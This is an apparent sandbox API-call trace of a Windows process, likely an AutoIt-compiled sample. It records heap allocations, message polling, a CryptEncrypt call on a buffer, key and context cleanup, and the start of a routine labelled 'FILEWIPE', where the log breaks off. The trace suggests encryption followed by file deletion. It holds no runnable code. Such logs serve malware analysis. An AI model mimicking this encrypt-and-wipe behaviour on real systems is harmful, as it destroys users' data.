[0193.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0193.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0193.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x6ccb) returned 0xbea018 [0193.104] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0193.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0193.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0193.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0193.104] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0193.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0193.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0193.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0193.104] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0193.104] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0193.104] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0193.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0193.105] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0193.105] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0193.105] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0193.105] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0193.105] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0193.105] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0193.105] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0193.105] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0193.105] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0193.105] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0193.105] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa548 [0193.105] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0193.105] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0193.105] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0193.105] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0193.105] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0193.105] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0193.105] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0193.105] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0193.105] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0193.105] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0193.106] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0193.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0193.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0193.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0193.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0193.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0193.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0193.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0193.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0193.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0193.106] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0193.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0193.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0193.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0193.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0193.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0193.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0193.106] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0193.106] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0193.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0193.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0193.106] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0193.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0193.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0193.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0193.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0193.107] CryptGetKeyParam (in: hKey=0x90af18, dwParam=0x7, pbData=0x9c27e8, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c27e8*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0193.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0193.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0193.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0193.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0193.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0193.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0193.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0193.108] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0193.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0193.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0193.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0193.108] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0193.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0193.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0193.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0193.108] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.108] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.108] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.109] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.109] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.109] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.109] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0193.109] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0193.109] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0193.109] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0193.109] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0193.109] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0193.109] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0193.109] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0193.109] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0193.109] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0193.109] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.109] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.109] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.109] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.109] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0193.110] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0193.110] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0193.110] CryptEncrypt (in: hKey=0x90af18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0x6ccb, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0x6cd0) returned 1 [0193.110] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.110] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.110] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.110] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.110] CharLowerBuffW (in: lpsz="byte[27857]", cchLength=0xb | out: lpsz="byte[27857]") returned 0xb [0193.110] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.111] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.111] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0193.111] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0193.113] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0193.113] CryptEncrypt (in: hKey=0x90af18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xbfe6a0*, pdwDataLen=0x87e820*=0x6ccb, dwBufLen=0x6cd0 | out: pbData=0xbfe6a0*, pdwDataLen=0x87e820*=0x6cd0) returned 1 [0193.113] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.113] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.113] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.115] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.115] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.115] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.115] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0193.115] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0193.115] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0193.115] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0193.115] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0193.115] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0193.115] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0193.115] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0193.115] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0193.115] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0193.115] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0193.120] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0193.120] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0193.120] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0193.124] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0193.124] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0193.124] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0193.124] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0193.124] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0193.124] PeekMessageW (in: lpMsg=0x87e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9fc) returned 0 [0193.124] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0193.125] CryptDestroyKey (hKey=0x90af18) returned 1 [0193.125] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0193.125] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0193.125] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0193.125] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0193.125] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0193.125] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0193.125] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0193.125] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0193.125] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0193.125] PeekMessageW (in: lpMsg=0x87e9d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9d4) returned 0 [0193.126] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0193.126] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0193.126] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0193.126] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0193.126] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0193.126] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0193.126] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0193.126] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0193.126] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0193.126] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0193.126] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0193.126] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0193.126] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0193.126] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0193.126] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0193.126] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0193.126] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0193.127] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0193.127] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0193.127] CryptReleaseContext (hProv=0x9c0b78, dwFlags=0x0) returned 1 [0193.127] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0193.127] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0193.127] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0193.127] FreeLibrary (hLibModule=0x74f20000) returned 1 [0193.127] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0193.127] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0193.127] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0193.127] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0193.128] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0193.129] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0193.129] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0193.129] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0193.129] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0193.129] FindFirstFileW (in: 